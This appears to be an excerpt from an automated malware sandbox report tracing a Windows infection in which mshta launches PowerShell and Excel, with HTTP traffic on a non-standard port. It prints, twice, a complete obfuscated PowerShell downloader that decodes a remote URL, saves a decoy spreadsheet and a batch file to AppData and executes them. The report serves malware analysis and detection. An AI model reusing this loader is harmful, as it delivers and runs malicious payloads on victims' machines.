Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_036A75CF push cs; iretd	1_2_036A75D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_036A759D push cs; iretd	1_2_036A75C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_036A7B7B push ss; iretd	1_2_036A7B8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_02F212D8 push esp; retf 0002h	10_2_02F212E1

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 7287
Source: unknown	Network traffic detected: HTTP traffic on port 7287 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7287
Source: unknown	Network traffic detected: HTTP traffic on port 7287 -> 49731

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
